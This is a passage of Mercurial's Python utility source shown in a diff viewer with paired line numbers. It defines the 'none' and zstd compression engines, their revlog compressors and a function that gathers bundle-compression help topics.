3563 3575 for chunk in filechunkiter(fh):
3564 3576 yield d.decompress(chunk)
3565 3577
3566 3578 return chunkbuffer(gen())
3567 3579
3568 3580 compengines.register(_truncatedbz2engine())
3569 3581
3570 3582 class _noopengine(compressionengine):
3571 3583 def name(self):
3572 3584 return 'none'
3573 3585
3574 3586 def bundletype(self):
3575 3587 """No compression is performed.
3576 3588
3577 3589 Use this compression engine to explicitly disable compression.
3578 3590 """
3579 3591 return 'none', 'UN'
3580 3592
3581 3593 # Clients always support uncompressed payloads. Servers don't because
3582 3594 # unless you are on a fast network, uncompressed payloads can easily
3583 3595 # saturate your network pipe.
3584 3596 def wireprotosupport(self):
3585 3597 return compewireprotosupport('none', 0, 10)
3586 3598
3587 3599 # We don't implement revlogheader because it is handled specially
3588 3600 # in the revlog class.
3589 3601
3590 3602 def compressstream(self, it, opts=None):
3591 3603 return it
3592 3604
3593 3605 def decompressorreader(self, fh):
3594 3606 return fh
3595 3607
3596 3608 class nooprevlogcompressor(object):
3597 3609 def compress(self, data):
3598 3610 return None
3599 3611
3600 3612 def revlogcompressor(self, opts=None):
3601 3613 return self.nooprevlogcompressor()
3602 3614
3603 3615 compengines.register(_noopengine())
3604 3616
3605 3617 class _zstdengine(compressionengine):
3606 3618 def name(self):
3607 3619 return 'zstd'
3608 3620
3609 3621 @propertycache
3610 3622 def _module(self):
3611 3623 # Not all installs have the zstd module available. So defer importing
3612 3624 # until first access.
3613 3625 try:
3614 3626 from . import zstd
3615 3627 # Force delayed import.
3616 3628 zstd.__version__
3617 3629 return zstd
3618 3630 except ImportError:
3619 3631 return None
3620 3632
3621 3633 def available(self):
3622 3634 return bool(self._module)
3623 3635
3624 3636 def bundletype(self):
3625 3637 """A modern compression algorithm that is fast and highly flexible.
3626 3638
3627 3639 Only supported by Mercurial 4.1 and newer clients.
3628 3640
3629 3641 With the default settings, zstd compression is both faster and yields
3630 3642 better compression than ``gzip``. It also frequently yields better
3631 3643 compression than ``bzip2`` while operating at much higher speeds.
3632 3644
3633 3645 If this engine is available and backwards compatibility is not a
3634 3646 concern, it is likely the best available engine.
3635 3647 """
3636 3648 return 'zstd', 'ZS'
3637 3649
3638 3650 def wireprotosupport(self):
3639 3651 return compewireprotosupport('zstd', 50, 50)
3640 3652
3641 3653 def revlogheader(self):
3642 3654 return '\x28'
3643 3655
3644 3656 def compressstream(self, it, opts=None):
3645 3657 opts = opts or {}
3646 3658 # zstd level 3 is almost always significantly faster than zlib
3647 3659 # while providing no worse compression. It strikes a good balance
3648 3660 # between speed and compression.
3649 3661 level = opts.get('level', 3)
3650 3662
3651 3663 zstd = self._module
3652 3664 z = zstd.ZstdCompressor(level=level).compressobj()
3653 3665 for chunk in it:
3654 3666 data = z.compress(chunk)
3655 3667 if data:
3656 3668 yield data
3657 3669
3658 3670 yield z.flush()
3659 3671
3660 3672 def decompressorreader(self, fh):
3661 3673 zstd = self._module
3662 3674 dctx = zstd.ZstdDecompressor()
3663 3675 return chunkbuffer(dctx.read_from(fh))
3664 3676
3665 3677 class zstdrevlogcompressor(object):
3666 3678 def __init__(self, zstd, level=3):
3667 3679 # Writing the content size adds a few bytes to the output. However,
3668 3680 # it allows decompression to be more optimal since we can
3669 3681 # pre-allocate a buffer to hold the result.
3670 3682 self._cctx = zstd.ZstdCompressor(level=level,
3671 3683 write_content_size=True)
3672 3684 self._dctx = zstd.ZstdDecompressor()
3673 3685 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3674 3686 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3675 3687
3676 3688 def compress(self, data):
3677 3689 insize = len(data)
3678 3690 # Caller handles empty input case.
3679 3691 assert insize > 0
3680 3692
3681 3693 if insize < 50:
3682 3694 return None
3683 3695
3684 3696 elif insize <= 1000000:
3685 3697 compressed = self._cctx.compress(data)
3686 3698 if len(compressed) < insize:
3687 3699 return compressed
3688 3700 return None
3689 3701 else:
3690 3702 z = self._cctx.compressobj()
3691 3703 chunks = []
3692 3704 pos = 0
3693 3705 while pos < insize:
3694 3706 pos2 = pos + self._compinsize
3695 3707 chunk = z.compress(data[pos:pos2])
3696 3708 if chunk:
3697 3709 chunks.append(chunk)
3698 3710 pos = pos2
3699 3711 chunks.append(z.flush())
3700 3712
3701 3713 if sum(map(len, chunks)) < insize:
3702 3714 return ''.join(chunks)
3703 3715 return None
3704 3716
3705 3717 def decompress(self, data):
3706 3718 insize = len(data)
3707 3719
3708 3720 try:
3709 3721 # This was measured to be faster than other streaming
3710 3722 # decompressors.
3711 3723 dobj = self._dctx.decompressobj()
3712 3724 chunks = []
3713 3725 pos = 0
3714 3726 while pos < insize:
3715 3727 pos2 = pos + self._decompinsize
3716 3728 chunk = dobj.decompress(data[pos:pos2])
3717 3729 if chunk:
3718 3730 chunks.append(chunk)
3719 3731 pos = pos2
3720 3732 # Frame should be exhausted, so no finish() API.
3721 3733
3722 3734 return ''.join(chunks)
3723 3735 except Exception as e:
3724 3736 raise error.RevlogError(_('revlog decompress error: %s') %
3725 3737 str(e))
3726 3738
3727 3739 def revlogcompressor(self, opts=None):
3728 3740 opts = opts or {}
3729 3741 return self.zstdrevlogcompressor(self._module,
3730 3742 level=opts.get('level', 3))
3731 3743
3732 3744 compengines.register(_zstdengine())
3733 3745
3734 3746 def bundlecompressiontopics():
3735 3747 """Obtains a list of available bundle compressions for use in help."""
3736 3748 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3737 3749 items = {}
3738 3750
3739 3751 # We need to format the docstring. So use a dummy object/type to hold it
3740 3752 # rather than mutating the original.
3741 3753 class docobject(object):
3742 3754 pass
3743 3755
3744 3756 for name in compengines:
3745 3757 engine = compengines[name]
3746 3758
3747 3759 if not engine.available():
3748 3760 continue
3749 3761
3750 3762 bt = engine.bundletype()
3751 3763 if not bt or not bt[0]:
3752 3764 continue
3753 3765
3754 3766 doc = pycompat.sysstr('``%s``\n %s') % (
3755 3767 bt[0], engine.bundletype.__doc__)
3756 3768
3757 3769 value = docobject()
3758 3770 value.__doc__ = doc
3759 3771 value._origdoc = engine.bundletype.__doc__
3760 3772 value._origfunc = engine.bundletype
3761 3773
3762 3774 items[bt[0]] = value
3763 3775
3764 3776 return items
3765 3777
3766 3778 i18nfunctions = bundlecompressiontopics().values()
3767 3779
3768 3780 # convenient shortcut
3769 3781 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now